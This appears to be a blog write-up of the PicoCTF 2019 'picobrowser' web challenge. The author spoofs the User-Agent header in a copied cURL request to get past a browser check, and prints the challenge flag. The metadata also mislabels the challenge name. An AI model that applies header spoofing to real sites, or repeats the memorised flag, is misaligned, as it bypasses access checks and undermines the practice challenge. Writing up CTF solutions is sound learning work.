PicoCTF Writeup – picobrowser
# Information:
CTF Name: PicoCTF
CTF Challenge: dont-use-client-side
Challenge Category: Web Exploitation
Challenge Points: 200
PicoCTF 2019.
# Challenge Description:
This website can be rendered only by picobrowser, go and catch the flag! https://jupiter.challenges.picoctf.org/problem/28921/ or http://jupiter.challenges.picoctf.org:28921
Hint: You don’t need to download a new web browser
# Writeup
In this challenge we are given an URL. It is also stated in the description that this website can only be rendered by picobrowser.
I decided to click the URL anyway and see what it returned, this was the result:
So far so good, so let’s see what happens if I click in the button “Flag”. An error appears, below you have an image:
In the error it is stated that our browser is not picobrowser, it is instead: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36.
I know, from previous challenges, this is the default of the HTTP header – ‘User-Agent’. I thought that maybe I could edit this value and make the request again.
To do so I followed the following procedure:
1- First I opened the developers tools by clicking F12 and opened the Network tab, as you can see in the image below:
2- Next I repeated the request by click on the “Flag” button, after doing so the network tab in the developer tools registered the communication between the browser and server, see image below:
3- As you can see you have to requests with the name flag, the first has a status code of 307, which means redirect so we can ignore it, the second one has a status code of 200, which means the request returned OK, so it must be this request that we must change. To do so I right clicked on it and chose the option Copy -> Copy as cURL, as you can see in the image below:
4- After copying the request in the cURL syntax I pasted it in a text editor and changed the ‘User-Agent’ header to picobrowser, as such:
curl ‘https://jupiter.challenges.picoctf.org/problem/28921/flag’ \
-H ‘Connection: keep-alive’ \
-H ‘Upgrade-Insecure-Requests: 1’ \
-H ‘User-Agent: picobrowser’ \
-H ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,
image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9′ \
-H ‘Sec-Fetch-Site: same-origin’ \
-H ‘Sec-Fetch-Mode: navigate’ \
-H ‘Sec-Fetch-User: ?1’ \
-H ‘Sec-Fetch-Dest: document’ \
-H ‘Referer: https://jupiter.challenges.picoctf.org/problem/28921/’ \
-H ‘Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7’ \
-H ‘Cookie: _ga=GA1.2.96783362.1610984369; _gid=GA1.2.116443271.1611157562’ \ –compressed
5- Finally, I went to the Linux terminal and I pasted the command above. The output was an html text file:
As you can see, we have the flag!
Show flag
picoCTF{p1c0_s3cr3t_ag3nt_84f9c865}
I just want to say that there are other ways to solve this challenge, you can use Burp Suite for example.
Thank you very much for reading!
Cheers,
MRegra
Share this post:
Popular posts
Author Profile
Hello there! This is kind of off topic but I need some guidance
from an established blog. Is it tough to set up your own blog?
I’m not very techincal but I can figure things out pretty fast.
I’m thinking about creating my own but I’m not sure where to start.
Do you have any points or suggestions? Thanks
Hello, sure! I can write a post on this 🙂
I will try to finish it this week.
Thanks for the feedback, have a nice day.